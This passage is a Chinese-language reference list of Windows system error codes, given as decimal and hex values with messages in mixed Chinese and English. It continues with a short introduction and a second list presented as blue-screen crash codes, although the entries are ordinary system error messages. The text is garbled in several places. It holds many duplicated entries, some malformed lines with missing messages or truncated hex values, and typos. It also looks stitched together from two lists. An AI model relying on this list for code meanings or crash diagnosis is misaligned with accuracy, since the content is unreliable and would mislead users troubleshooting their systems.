尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。 150 0x0096 CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。 151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。 152 0x0098 DosMuxSemWait 没有执行;设定太多的 semaphore。 153 0x0099 DosMuxSemWait 清单不正确。 154 0x009A 您所输入的储存媒体标 元长度限制。 155 0x009B 无法建立其它的执行绪。 156 0x009C 接收行程拒绝接受信号。 157 0x009D 区段已经被舍弃,无法被锁定。 158 0x009E 区段已经解除锁定。 159 0x009F 执行绪识别码的地址不正确。 160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。 161 0x00A1 指定的路径不正确。 162 0x00A2 信号等候处理。 164 0x00A4 系统无法建立执行绪。 167 0x00A7 无法锁定档案的部份范围。 170 0x00AA 所要求的资源正在使用中。 173 0x00AD 取消范围的锁定要求不明显。 174 0x00AE 档案系统不支持自动变更锁定类型。 180 0x00B4 系统发现不正确的区段号码。 182 0x00B6 操作系统无法执行 %1。 182 0x00B6 操作系统无法执行 %1。 183 0x00B7 档案已存在,无法建立同一档案。 186 0x00BA 传送的旗号错误。 187 0x00BB 指定的系统旗号找不到。 188 0x00BC 操作系统无法执行 %1。 189 0x00BD 操作系统无法执行 %1。 190 0x00BE 操作系统无法执行 %1。 191 0x00BF 无法在 Win32 模式下执行 %1。 192 0x00C0 操作系统无法执行 %1。 193 0x00C1 201 0x00C9 操作系统无法执行 %1。
202 0x00CA 操作系统无法执行 %1。 203 0x00CB 系统找不到输入的环境选项。\r 205 0x00CD 在指令子目录下,没有任何行程有信号副处理程序。 206 0x00CE 文件名称或扩展名太长。 207 0x00CF ring 2 堆栈使用中。 207 0x00CF ring 2 堆栈使用中。 208 0x00D0 输入的通用档名字元 * 或 ? 不正确, 或指定太多的通用檔名字元。 209 0x00D1 所传送的信号不正确。 210 0x00D2 无法设定信号处理程序。 212 0x00D4 区段被锁定,而且无法重新配置。 214 0x00D6 附加到此程序或动态连结模块的动态连结模块太多。 215 0x00D7 Can’t nest calls to LoadModule. 230 0x00E6 The pipe state is invalid. 231 0x00E7 所有的 pipe instances 都在忙碌中。 232 0x00E8 The pipe is being closed. 233 0x00E9 No process is on the other end of the pipe. 234 0x00EA 有更多可用的资料。 240 0x00F0 作业阶段被取消。 254 0x00FE 指定的延伸属性名称无效。 255 0x00FF 延伸的属性不一致。 259 0x0103 没有可用的资料。 266 0x010A 无法使用 Copy API。 267 0x010B 目录名称错误。 275 0x0113 延伸属性不适用于缓冲区。 276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。 277 0x0115 延伸属性表格文件满。 278 0x0116 指定的延伸属性代码无效。 278 0x0116 指定的延伸属性代码无效。 282 0x011A 外挂的这个档案系统不支持延伸属性。 288 0x0120 意图释放不属于叫用者的 mutex。 298 0x012A semaphore 传送次数过多。 299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。 317 0x013D 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。 487 0x01E7 尝试存取无效的地址。 534 0x0216 运算结果超过 32 位。 535 0x0217 信道的另一端有一个行程在接送资料。 536 0x0218 等候行程来开启信道的另一端。 994 0x03E2 存取延伸的属性被拒。 995 0x03E3 由于执行绪结束或应用程序要求,而异常终止 I/O 作业。 996 0x03E4 重叠的 I/O 事件不是设定成通知状态。 997 0x03E5 正在处理重叠的 I/O 作业。 998 0x03E6 对内存位置的无效存取。 999 0x03E7 执行 inpage 作业发生错误。 1001 0x03E9 递归太深,堆栈满溢。 1002 0x03EA 窗口无法用来传送讯息。 1003 0x03EB 无法完成这项功能。 1004 0x03EC 旗号无效。 1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需的系统驱动程序,而且该储存媒体并未毁损。 1006 0x03EE 储存该档案的外部媒体发出警告,表示该已开启档案已经无效。 1007 0x03EF 所要求的作业无法在全屏幕模式下执行。 1008 0x03F0 An attempt was made to reference a token that does not exist. 1009 0x03F1 组态系统登录数据库毁损。 1010 0x03F2 组态系统登录机码无效。 1011 0x03F3 无法开启组态系统登录机码。 1012 0x03F4 无法读取组态系统登录机码。 1013 0x03F5 无法写入组态系统登录机码。 1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。 1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存内容毁损、会是档案无法复原。 1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。 1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中, 但是,指定档案的格式不是系统登录文件的格式。 1018 0x03FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1018 0x03FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1019 0x03FB 系统无法配置系统登录记录所需的空间。 1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。 1021 0x03FD 无法在临时机码下建立永久的子机码。 1022 0x03FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。 1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。 1052 0x041C 要求的控制对此服务无效 1053 0x041D The service did not respond to the start or control request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。 1055 0x041F 服务数据库被锁定。 1056 0x0420 这种服务已经在执行。 1057 0x0421 帐户名称错误或者不存在。 1058 0x0422 指定的服务暂停作用,无法激活。 1059 0x0423 指定循环服务从属关系。 1060 0x0424 指定的服务不是安装进来的服务。 1061 0x0425 该服务项目此时无法接收控制讯息。 1062 0x0426 服务尚未激活。 1063 0x0427 无法联机到服务控制程序。 1064 0x0428 处理控制要求时,发生意外状况。 1065 0x0429 指定的数据库不存在。 1065 0x0429 指定的数据库不存在。 1066 0x042A 服务传回专属于服务的错误码。 1067 0x042B The process terminated unexpectedly. 1068 0x042C 从属服务或群组无法激活。 1069 0x042D 因为登入失败,所以没有激活服务。 1070 0x042E 在激活之后,服务在激活状态时当机。 1071 0x042F 指定服务数据库锁定无效。 1072 0x0430 指定的服务已经标示为删除。 1073 0x0431 指定的服务已经存在。 1074 0x0432 系统目前正以上一次执行成功的组态执行。 1075 0x0433 从属服务不存在,或已经标示为删除。 1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。 1077 0x0435 上一次激活之后,就没有再激活服务。 1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。 1100 0x044C 已经到了磁带的最后。 1101 0x044D 到了档案标示。 1102 0x044E 遇到磁带的开头或分割区。 1103 0x044F 到了档案组的结尾。 1104 0x0450 磁带没有任何资料。 1105 0x0451 磁带无法制作分割区。 1106 0x0452 存取多重容体的新磁带时,发现目前 区块大小错误。 1107 0x0453 加载磁带时,找不到磁带分割区信息。 1108 0x0454 无法锁住储存媒体退带功能。 1108 0x0454 无法锁住储存媒体退带功能。 1109 0x0455 无法解除加载储存媒体。 1110 0x0456 磁盘驱动器中的储存媒体已经变更。 1111 0x0457 已经重设 I/O 总线。 1112 0x0458 磁盘驱动器没有任何储存媒体。 1113 0x0459 目标 multi-byte code page,没有对应 Unicode 字符。 1114 0x045A 动态链接库 (DLL) 起始例程失败。 1115 0x045B 系统正在关机。 1116 0x045C 无法中止系统关机,因为没有关机的动作在进行中。 1117 0x045D 因为 I/O 装置发生错误,所以无法执行要求。 1118 0x045E 序列装置起始失败,会取消加载序列驱动程序。 1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。 至少已经有一个使用同一IRQ 的其它装置已经开启。 1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.) 1121 0x0461 因为已经过了逾时时间,所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。) 1122 0x0462 在磁盘找不到任何的 ID 地址标示。 1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。 1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。 1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。 1126 0x0466 存取硬盘失败,重试后也无法作业。 1127 0x0467 存取硬盘失败,重试后也无法作业。 1128 0x0468 存取硬盘时,必须重设磁盘控制卡,但是 连重设的动作也失败。 1129 0x0469 到了磁带的最后。 1130 0x046A 可用服务器储存空间不足,无法处理这项指令。 1131 0x046B 发现潜在的死锁条件。 1132 0x046C 指定的基本地址或档案位移没有适当 对齐。 1140 0x0474 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。 1141 0x0475 系统 BIOS 无法变更系统电源状态。 1150 0x047E 指定的程序需要新的 Windows 版本。 1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。 1152 0x0480 指定的程序已经激活,无法再激活一次。 1153 0x0481 指定的程序是为旧版的 Windows 所写的。 1154 0x0482 执行此应用程序所需的链接库档案之一毁损。 1155 0x0483 没有应用程序与此项作业的指定档案建立关联。 1156 0x0484 传送指令到应用程序发生错误。 1157 0x0485 找不到执行此应用程序所需的链接库档案。 1200 0x04B0 指定的装置名称无效。 1201 0x04B1 装置现在虽然未联机,但是它是一个记忆联机。 1202 0x04B2 尝试记忆已经记住的装置。 1203 0x04B3 提供的网络路径找不到任何网络提供程序。 1203 0x04B3 提供的网络路径找不到任何网络提供程序。 1204 0x04B4 指定的网络提供程序名称错误。 1205 0x04B5 无法开启网络联机设定文件。 1206 0x04B6 网络联机设定文件坏掉。 1207 0x04B7 无法列举非容器。 1208 0x04B8 发生延伸的错误。 1209 0x04B9 指定的群组名称错误。 1210 0x04BA 指定的计算机名称错误。 1211 0x04BB 指定的事件名称错误。 1212 0x04BC 指定的网络名称错误。 1401 0x0579 菜单识别码无效。
1402 0x057A 光标句柄无效。 1403 0x057B 加速键表格句柄无效。 1403 0x057B 加速键表格句柄无效。 1404 0x057C Invalid hook handle. 1405 0x057D 无效的多重窗口位置结构控制。 1406 0x057E 无法建立最上层的子窗口。 1407 0x057F 找不到 window class。 1408 0x0580 无效的窗口,属于其它的执行绪。 1409 0x0581 快速键已经登记。 1410 0x0582 Class 已经存在。 1411 0x0583 Class 不存在。 1412 0x0584 Class 仍然有开启的窗口。 1413 0x0585 无效的索引。 1414 0x0586 图标句柄无效。 1415 0x0587 使用专用的 DIALOG 窗口文字。 1416 0x0588 清单方块识别码找不到。 1417 0x0589 找不到任何通配字符。 1418 0x058A 执行绪 (thread) 没有开启剪贴簿。 1419 0x058B 快速键没有登记。 1420 0x058C 不是有效的对话窗口。 1421 0x05 Control ID 找不到。 1422 0x058E 清单方块的讯息无效,因为没有任何的编辑句柄。 1423 0x058F 窗口不是一个清单方块。 1424 0x0590 高度必须小于 256。 1425 0x0591 装置范围 (DC) 句柄无效。 1425 0x0591 装置范围 (DC) 句柄无效。 1426 0x0592 锁定程序类型无效。 1427 0x0593 锁定程序无效。 1428 0x0594 没有模块句柄就不能设定非本区的锁定。 1429 0x0595 This hook procedure can only be set globally. 1430 0x0596 The journal hook procedure is already installed. 1431 0x0597 The hook procedure is not installed. 1432 0x0598 无效的单一选择清单方块讯息。 1433 0x0599 LB_SETCOUNT 传送到 non-lazy 清单方块。 1434 0x059A 这个清单方块不支持跳格停驻。 1435 0x059B 不可毁损由其它执行绪所建立的对象。 1436 0x059C 子窗口不能有菜单。 1437 0x059D 窗口没有系统菜单。 1438 0x059E 无效的消息框样式。 1439 0x059F 无效的 sys tem-wide (SPI_*) 参数。 1440 0x05A0 屏幕已经锁定。 1441 0x05A1 All handles to windows in a multiple-window position structure must have the same parent. 1442 0x05A2 窗口不是子窗口。 1443 0x05A3 GW_* 指令无效。 1444 0x05A4 执行绪识别码无效。 1445 0x05A5 无法处理多重文件接口窗口的讯息。 1445 0x05A5 无法处理多重文件接口窗口的讯息。 1446 0x05A6 即现式菜单已在作用中。 1447 0x05A7 窗口没有滚动条。 1448 0x05A8 滚动条范围不可以大于 0x7FFF。 1449 0x05A9 无法以指定的方式显示或移除窗口。 1450 0x05AA 系统资源不足,无法完成所要求的服务。 1451 0x05AB 系统资源不足,无法完成所要求的服务。 1452 0x05AC 系统资源不足,无法完成所要求的服务。 1453 0x05AD 配额不足,无法完成所要求的服务。 1454 0x05AE 配额不足,无法完成所要求的服务。 1455 0x05AF 这项作业的 paging 文件太小,无法完成作业。 1456 0x05B0 找不到菜单项目。 1500 0x05DC 事件记录文件坏掉。 1501 0x05DD 无法开启事件记录文件,因此事件记录服务没有激活。 1502 0x05DE 事件记录文件已满。 1503 0x05DF 事件记录文件已经变更。 1700 0x06A4 字符串连结错误。 1701 0x06A5 连结句柄 (binding handle) 的类型错误。 1702 0x06A6 连结句柄 (binding handle) 无效。 1703 0x06A7 不支持 RPC 通讯协议顺序。 1704 0x06A8 RPC 通讯协议顺序无效。 1705 0x06A9 字符串 universal unique identifier (UUID) 无效。 1705 0x06A9 字符串 universal unique identifier (UUID) 无效。 1706 0x06AA 端点格式错误。 1707 0x06AB 网络地址无效。 1708 0x06AC 找不到端点。 1709 0x06AD 逾时数值无效。 1710 0x06AE 找不到对象的 universal unique identifier (UUID)。 1711 0x06AF 对象的 universal unique identifier (UUID) 已经登记。 1712 0x06B0 类型的 universal unique identifier (UUID) 已经登记。 1713 0x06B1 RPC 服务器已经在听候。 1714 0x06B2 没有登记通讯协议顺序。 1715 0x06B3 RPC 服务器没有听候指令。 1716 0x06B4 管理员类型不详。 1717 0x06B5 接口不详。 1718 0x06B6 没有联机。 1719 0x06B7 没有通讯协议顺序。 1720 0x06B8 无法建立端点。 1721 0x06B9 资源不足,无法完成作业。 1722 0x06BA RPC 服务器无法使用。 1723 0x06BB RPC 服务器太忙,无法完成这项作业。 1724 0x06BC 网络选项无效。 1725 0x06BD 这个执行绪 (thread) 没有任何执行的远程过程调用。 1726 0x06BE 远程过程调用失败。 1727 0x06BF 远程过程调用失败,所以没有执行。 1727 0x06BF 远程过程调用失败,所以没有执行。 1728 0x06C0 远程过程调用 (remote procedure call,RPC) 通讯协议发生错误。 1730 0x06C2 RPC 服务器不支持转送语法。 1732 0x06C4 不支持 universal unique identifier (UUID) 的类型。 1733 0x06C5 封签 (tag) 无效。 1734 0x06C6 数组无效。 1735 0x06C7 连结中没有项目名称。 1736 0x06C8 名称语法无效。 1737 0x06C9 名称语法不被支持。 1739 0x06CB 没有任何网络地址可以用来建立全球唯一的识别码 (UUID)。 1740 0x06CC 端点重复。 1741 0x06CD 授权类型不详。 1742 0x06CE 呼叫次数的上限太小。 1743 0x06CF 字符串太长。 1744 0x06D0 找不到 RPC 通讯协议顺序。 1745 0x06D1 程序号码超出范围。 1746 0x06D2 连结中没有包含任何确认信息。 1747 0x06D3 确认服务不详。 1748 0x06D4 确认层次不详。 1749 0x06D5 安全内容无效。 1750 0x06D6 确认服务不详。 1751 0x06D7 项目无效。 1751 0x06D7 项目无效。 1752 0x06D8 服务器端点无法执行这个作业。 1753 0x06D9 端点对应程序没有其它的端点。 1754 0x06DA 没有汇出任何的接口。 1755 0x06DB 项目名称不完整。 1756 0x06DC 版本选项无效。 1757 0x06DD 没有其它的成员。 1758 0x06DE 没有任何资料可以取消汇出。 1759 0x06DF 接口找不到。 1760 0x06E0 项目已经存在。 1761 0x06E1 项目找不到。 1762 0x06E2 名称服务无法使用。 1763 0x06E3 网络地址系列无效。 1764 0x06E4 要求的作业不受支持。 1765 0x06E5 没有可用来仿真的安全内容。 1766 0x06E6 远程过程调用 (RPC) 发生内部错误。 1767 0x06E7 RPC 服务器尝试用整数除以 0。 1768 0x06E8 RPC 服务器发生地址设定错误。 1769 0x06E9 RPC 服务器的浮点作业导致除以 0 的运算。 1770 0x06EA RPC 服务器发生浮点 underflow。 1771 0x06EB RPC 服务器发生浮点 overflow。 1772 0x06EC 清单中可供连结自动代码 的 RPC 服务器已经用完。 1773 0x06ED 无法开启字符转换表档案。 1773 0x06ED 无法开启字符转换表档案。 1774 0x06EE 包含字符转换表的档案少于 512 字节。 1775 0x06EF 在远程过程调用时,将空的 context 代码从 客户端传送到主计算机。 1777 0x06F1 在远程过程调用时内容处理改变。 1778 0x06F2 传送给远程过程调用的连结代码不符。 1779 0x06F3 The stub is unable to get the remote procedure call handle. 1780 0x06F4 A null reference pointer was passed to the stub. 1781 0x06F5 The enumeration valuesss is out of range. 1782 0x06F6 字节计数太小。 1783 0x06F7 The stub received bad data. 1784 0x06F8 所提供的使用者缓冲区对要求的作业无效。 1785 0x06F9 无法辨识磁盘储存媒体。磁盘储存媒体可能还没有制作格式。 1786 0x06FA The workstation does not have a trust secret. 1787 0x06FB The SAM database on the Windows NT Server does not have a computer account for this workstation trust relationship. 1788 0x06FC The trust relationship between the primary domain and the trusted domain failed. 1789 0x06FD The trust relationship between this workstation and theprimary domain failed. 1790 0x06FE 网络登入失败。 1790 0x06FE 网络登入失败。 1791 0x06FF 远程过程调用已经在这个执行绪进行中。 1792 0x0700 尝试登入,但网络登入服务尚未激活。 1793 0x0701 使用者的帐户已经过期。 1794 0x0702 The redirector is in use and cannot be unloaded. 1795 0x0703 指定的打印机驱动程序已经安装。 1796 0x0704 指定的连接埠无法识别。 1797 0x0705 打印机驱动程序无法识别。 1798 0x0706 打印处理器不详。 1799 0x0707 指定的分隔档无效。 1800 0x0708 指定的优先级无效。 1801 0x0709 打印机名称无效。 1802 0x070A 打印机已经存在。 1803 0x070B 打印机指令无效。 1804 0x070C 指定的数据类型无效。 1805 0x070D 指定的 Environment 无效。 1806 0x070E 没有其它的连结。 1807 0x070F 这是一个跨网域的信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。 1808 0x0710 这是一个计算机帐户。请使用您的全域性使用者帐户或区域性使用者帐户来存取这个服务器。 1809 0x0711 这是一个伺服端信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。 1810 0x0712 指定的网域名称或安全识别码与网域信用信息 不符。 1811 0x0713 服务器正在使用中,无法卸载。 1812 0x0714 指定的影像档案没有有包含资源区段。 1813 0x0715 在影像文件找不到指定的资源类型。 1814 0x0716 在影像文件找不到指定的资源名称。 1815 0x0717 在影像文件找不到指定的资源语系识别码。 1816 0x0718 可用的配额不足,无法处理这项指令。 1817 0x0719 登录任何接口。 1818 0x071A 处理这项呼叫的时候,服务器发生变更。 1819 0x071B 连结代码没有包含所有必须的信息。 1820 0x071C 通讯失败。 1821 0x071D 要求的认证层次不被支持。 1822 0x071E 没有登记任何主要的名称。 1823 0x071F 指定的错误不是有效的 Windows RPC 错误码。 1824 0x0720 A UUID that is valid only on this computer has been allocated. 1825 0x0721 发生安全包装指定错误。 1826 0x0722 没有取消执行绪 (THREAD) 1827 0x0723 针对编码/译码的代码进行无效的作业。 1828 0x0724 Incompatible version of the serializing package. 1829 0x0725 不兼容的 RPC stub 版本。 1898 0x076A 找不到群组成员。 1899 0x076B 无法建立 endpoint mapper 数据库。 1900 0x076C The object universal unique identifier (UUID) is the nil UUID. 1901 0x076D 指定的项目无效。 1902 0x076E 指定窗体名称错误。 1903 0x076F 指定的窗体大小错误。 1904 0x0770 指定的打印机句柄已经在等候。 1905 0x0771 指定的打印机已经删除 1906 0x0772 打印机的状态错误。 1907 0x0773 使用者在第一次登入之前,必须先变更它的密码。 1908 0x0774 找不到这个网域的域控制器。 1909 0x0775 参照的帐户目前被锁定,无法登入。 2000 0x07D0 像素格式无效。 2001 0x07D1 指定的驱动程序无效。 2002 0x07D2 窗口样式或 class 属性对这项作业无效。 2003 0x07D3 不支持所要求的中继文件作业。 2004 0x07D4 不支持要求的传输作业。 2005 0x07D5 不支持要求的剪辑作业。 2005 0x07D5 不支持要求的剪辑作业。 2202 0x089A 指定的使用者名称无效。 2250 0x08CA 网络联机不存在。 2401 0x0961 这个网络联机已经开启档案或者要求暂停。 2402 0x0962 现行的联机仍然存在。 2404 0x0964 装置正在使用中,无法中断联机。 3000 0x0BB8 指定的打印机监视器不详。 3001 0x0BB9 指定的打印机驱动程序正在使用中。 3002 0x0BBA 找不到排存盘。 3003 0x0BBB 没有发出 StartDocPrinter 呼叫。 3004 0x0BBC 没有发出 AddJob 呼叫。 3005 0x0BBD 指定的打印处理器已经安装。 3006 0x0BBE 指定打印监控程序已经安装。 4000 0x0FA0 在处理指令时,WINS 发生错误。 4001 0x0FA1 无法删除区域的 WINS。 4002 0x0FA2 The importation from the file failed. 4003 0x0FA3 制作备份失败。以前执行过完整的备份吗? 4004 0x0FA4 无法制作备份,请检查目录。 4005 0x0FA5 名称不在 WINS 数据库中。 4006 0x0FA6 不可用未设定的打印机来取代。 6118 0x17E6 这个工作群组的服务清单目前无法使用. 使用Windows出现蓝色屏幕是经常的事,而且每每因为不清楚错误的来源而频繁重新安装系统,劳神费时。下列收集了一些Windows死机密码,供大家参考。 0x0000 操作完成 0x0001 不正确的函数 0x0002 系统找不到指定的文件 0x0003 系统找不到指定的路径 0x0004 系统无法打开文件 0x0005 拒绝存取 0x0006 无效的代码 0x0007 内存控制模块已损坏 0x0008 内存空间不足,无法处理这个指令 0x0009 内存控制模块地址无效 0x000a 环境不正确 0x000b 尝试载入一个格式错误的程序 0x000c 存取码错误 0x000d 资料错误 0x000e 内存空间不够,无法完成这项操作 0x000f 系统找不到制定的硬盘 0x0010 无法移除目录 0x0011 系统无法将文件移到其他的硬盘 0x0012 没有任何文件 0x0019 找不到指定的扇区或磁道 0x001a 指定的磁盘或磁片无法存取 0x001b 磁盘找不到要求的扇区 0x001c 打印机没有纸 0x001d 系统无法将资料写入制定的磁盘 0x001e 系统无法读取指定的装置 0x001f 连接到系统的某个装置没有作用 0x0021 文件的一部分被锁定 0x0024 开启的分享文件数量太多 0x0026 到达文件结尾 0x0027 磁盘已满 0x0036 网络繁忙 0x003b 网络发生意外的错误 0x0043 网络名称找不到 0x0050 文件已经存在 0x0052 无法建立目录或文件 0x0053 int24失败 0x006b 因为代用的磁盘尚未插入,所以程序已经停止 0x006c 磁盘正在使用中或被锁定 0x006f 文件名太长 0x0070 硬盘空间不足 0x007f 找不到指定的程序 0x045b 系统正在关机 0x045c 无法种植系统关机,因为没有关机的动作在进行中 0x046a 可用服务器储存空间不足,无法处理这项指令 0x047e 指定的程序需要新的Windows版本 0x047f 指定的程序不是Windows或MS-DOS程序 0x0480 指定的程序已经启动,无法再启动一次 0x0481 指定的程序是为旧版的Windows所写的 0x0482 执行此应用程序所需的程序库文件之一毁坏 0x0483 没有应用程序与此项操作的指定文件建立关联 0x0484 传送指令到应用程序发生错误 0x04b0 指定的装置名称无效 0x05a2 窗口不是子窗口 0x05aa 系统资源不足,无法完成所要求的服务 0x05ab 系统子还不足,无法完成所需要的服务 0x05ac 系统资源不足,无法完成所要求的服务 0x06b9 资源不足,无法完成操作 |
|
|